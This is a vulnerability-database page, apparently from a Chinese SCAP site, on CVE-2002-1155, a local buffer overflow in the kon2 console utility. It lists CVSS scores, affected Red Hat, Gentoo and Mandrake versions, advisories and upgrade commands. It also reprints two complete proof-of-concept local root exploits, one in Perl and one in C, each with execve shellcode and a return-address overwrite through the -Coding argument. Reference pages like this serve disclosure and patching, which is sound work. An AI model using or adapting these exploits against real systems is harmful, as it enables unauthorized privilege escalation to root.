CVE-2002-1155
CVSS7.2
发布时间 :2003-06-16 00:00:00
修订时间 :2016-10-17 22:24:13
NMCOES    

[原文]Buffer overflow in KON kon2 0.3.9b and earlier allows local users to execute arbitrary code via a long -Coding command line argument.


[CNNVD]Multiple Vendor kon2 Local缓冲区溢出漏洞(CNNVD-200306-067)

        KON kon2 0.3.9b以及之前版本存在缓冲区溢出漏洞。本地用户借助长编码命令行参数执行任意代码。

- CVSS (基础分值)

CVSS分值: 7.2 [严重(HIGH)]
机密性影响: COMPLETE [完全的信息泄露导致所有系统文件暴露]
完整性影响: COMPLETE [系统完整性可被完全破坏]
可用性影响: COMPLETE [可能导致系统完全宕机]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: LOCAL [漏洞利用需要具有物理访问权限或本地帐户]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

cpe:/a:redhat:linux:7.3
cpe:/a:redhat:linux:7.1
cpe:/a:redhat:linux:8.0
cpe:/a:redhat:linux:7.2
cpe:/a:redhat:linux:9.0

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1155
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2002-1155
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200306-067
(官方数据源) CNNVD

- 其它链接及资源

http://marc.info/?l=bugtraq&m=105474080512376&w=2
(UNKNOWN)  BUGTRAQ  20030603 kon2_exploit!!
http://marc.info/?l=bugtraq&m=105577912106710&w=2
(UNKNOWN)  BUGTRAQ  20030616 Next kon2root - Redhat 9
http://www.mandriva.com/security/advisories?name=MDKSA-2003:064
(UNKNOWN)  MANDRAKE  MDKSA-2003:064
http://www.redhat.com/support/errata/RHSA-2003-047.html
(VENDOR_ADVISORY)  REDHAT  RHSA-2003:047
http://www.redhat.com/support/errata/RHSA-2003-050.html
(UNKNOWN)  REDHAT  RHSA-2003:050

- 漏洞信息

Multiple Vendor kon2 Local缓冲区溢出漏洞
高危 缓冲区溢出
2003-06-16 00:00:00 2005-10-20 00:00:00
本地  
        KON kon2 0.3.9b以及之前版本存在缓冲区溢出漏洞。本地用户借助长编码命令行参数执行任意代码。

- 公告与补丁

        Gentoo Linux has released an advisory. Users who have installed app-i18n/kon2 are advised to upgrade to kon2-0.3.9b-r1 by issuing the following commands:
        emerge sync
        emerge kon2
        emerge clean
        Fixes available:
        RedHat kon2-0.3.9b-16.i386.rpm
        
        RedHat kon2-0.3.9b-7.i386.rpm
        
        RedHat kon2-0.3.9b-6.i386.rpm
        
        RedHat kon2-0.3.9b-13.i386.rpm
        
        kon2 kon2 0.3.9 b
        

- 漏洞信息 (22719)

kon2 Local Buffer Overflow Vulnerability (1) (EDBID:22719)
linux local
2003-06-03 Verified
0 wsxz
N/A [点击下载]
source: http://www.securityfocus.com/bid/7790/info

A buffer overflow vulnerability has been reported for the kon2 utility shipped with various Linux distributions. Exploitation of this vulnerability may result in a local attacker obtaining elevated privileges on a vulnerable system.

The vulnerability exists due to insufficient bounds checking performed on some commandline options passed to the vulnerable utility.

#!/usr/bin/perl
####################################################################################
#Priv8security.com kon2 version 0.3.9b-16 and < local root exploit.
#
#    Tested on Redhat 8.0. should work on 9.0 and 7.3
#    Bug happens on -Coding arg.
#    Based on Redhat Advisory.
#
#    [wsxz@localhost buffer]$ perl priv8kon.pl
#    -=[ Priv8security.com kon local root exploit ]=-
#    usage: priv8kon.pl offset
#    [+] Using ret shellcode 0xbfffffc6
#    Kanji ON Console ver.0.3.9 (2000/04/09)
#
#    KON> video type 'VGA' selected
#    KON> hardware scroll mode.
#    sh-2.05b# id
#    uid=0(root) gid=0(root) groups=500(wsxz)
####################################################################################


$shellcode =
"\x31\xc0\x31\xdb\xb0\x17\xcd\x80".#setuid 0
"\x31\xdb\x89\xd8\xb0\x2e\xcd\x80".#setgid 0
"\x31\xd2\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69".
"\x89\xe3\x52\x53\x89\xe1\x8d\x42\x0b\xcd\x80";

$path = "/usr/bin/kon";
$ret = 0xbffffffa - length($shellcode) - length($path);

$offset = $ARGV[0];

print "-=[ Priv8security.com kon2 local root exploit ]=-\n";
print "usage: $0 offset\n";
printf("[+] Using ret shellcode 0x%x\n",$ret + $offset);

$new_retword = pack('l', ($ret + $offset));
$buffer2 = "A" x 796;
$buffer2 .= $new_retword;
$buffer = $shellcode;
local($ENV{'WSXZ'}) = $buffer;
exec("$path -Coding $buffer2");

		

- 漏洞信息 (22720)

kon2 Local Buffer Overflow Vulnerability (2) (EDBID:22720)
linux local
2003-06-03 Verified
0 c0ntex
N/A [点击下载]
source: http://www.securityfocus.com/bid/7790/info
 
A buffer overflow vulnerability has been reported for the kon2 utility shipped with various Linux distributions. Exploitation of this vulnerability may result in a local attacker obtaining elevated privileges on a vulnerable system.
 
The vulnerability exists due to insufficient bounds checking performed on some commandline options passed to the vulnerable utility.

/*
 * Buffer overflow in /usr/bin/kon v0.3.9b for RedHat 9.0
 *
 * http://www.mail-archive.com/bugtraq@securityfocus.com/msg11681.html
 *
 * The original bug was found by wszx for RedHat 8.0 - Ported to C
 *
 * Compile: gcc -Wall kon2root kon2root.c
 *
 */


#include <stdio.h>
#include <string.h>
#include <unistd.h>


#define NOP      0x90
#define RET      0xbffffffa
#define VULN     "/usr/bin/kon"
#define MAXBUF   800


static char w00tI4r3l33t[]="\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07
\x89"
                           "\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56
\x0c"
                           "\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8
\xdc\xff"
                           "\xff\xff/bin/id";


int main()
{
        int i, *egg;
        long retaddr;
        static char buff[MAXBUF];
        static char *sploit[0x02] = { w00tI4r3l33t, NULL };


        fprintf (stdout, "\n\n\n[ PoC code for local root exploit in %s ]
\n", VULN);
        fprintf (stdout, "[ Coded by c0ntex  -  http://62.31.72.168 ]\n");
        fprintf (stdout, "[ For Linux RedHat v9 x86  -  Ret_Addr
0xbffffffa ]\n\n\n\n");

        if((retaddr = 0xbffffffa - strlen(w00tI4r3l33t) - strlen(VULN)) !
= 0x00) {
                egg = (int *)(buff);
        }

        for(i = 0x00; i < MAXBUF; i += 0x04)
        *(egg)++ = retaddr; *(egg) = NOP;

        execle(VULN, VULN, "-Coding", buff, NULL, sploit);

        return(0x00);
}
		

- 漏洞信息

2094
kon2 Command Line Parsing Overflow
Local Access Required Input Manipulation
Loss of Integrity
Exploit Public

- 漏洞描述

A local overflow exists in kon2. The "kon" program fails to sanitize buffer input resulting in a buffer overflow. With a specially crafted request, an attacker can gain root privileges resulting in a loss of integrity.

- 时间线

2003-06-03 Unknow
2003-06-16 Unknow

- 解决方案

Upgrade to version 0.3.9b-1 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.

- 相关参考

- 漏洞作者

Unknown or Incomplete

- 漏洞信息

Multiple Vendor kon2 Local Buffer Overflow Vulnerability
Boundary Condition Error 7790
No Yes
2003-06-03 12:00:00 2009-07-11 10:06:00
Discovery of this vulnerability credited to Janusz Niewiadomski.

- 受影响的程序版本

RedHat kon2-0.3.9b-7.i386.rpm
+ RedHat Linux 7.3
+ RedHat Linux 7.2
RedHat kon2-0.3.9b-6.i386.rpm
+ RedHat Linux 7.1
RedHat kon2-0.3.9b-16.i386.rpm
+ RedHat Linux 9.0 i386
RedHat kon2-0.3.9b-13.i386.rpm
+ RedHat Linux 8.0
kon2 kon2 0.3.9 b
+ Gentoo Linux 1.4 _rc3
+ Gentoo Linux 1.4 _rc2
+ MandrakeSoft Corporate Server 2.1
+ Mandriva Linux Mandrake 9.1
+ Mandriva Linux Mandrake 9.0
+ Mandriva Linux Mandrake 8.2

- 漏洞讨论

A buffer overflow vulnerability has been reported for the kon2 utility shipped with various Linux distributions. Exploitation of this vulnerability may result in a local attacker obtaining elevated privileges on a vulnerable system.

The vulnerability exists due to insufficient bounds checking performed on some commandline options passed to the vulnerable utility.

- 漏洞利用

The following proof of concept exploits have been supplied by priv8security and c0ntex &lt;c0ntex@hushmail.com&gt; respectively.

- 解决方案

Gentoo Linux has released an advisory. Users who have installed app-i18n/kon2 are advised to upgrade to kon2-0.3.9b-r1 by issuing the following commands:

emerge sync
emerge kon2
emerge clean

Fixes available:


RedHat kon2-0.3.9b-16.i386.rpm

RedHat kon2-0.3.9b-7.i386.rpm

RedHat kon2-0.3.9b-6.i386.rpm

RedHat kon2-0.3.9b-13.i386.rpm

kon2 kon2 0.3.9 b

- 相关参考

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站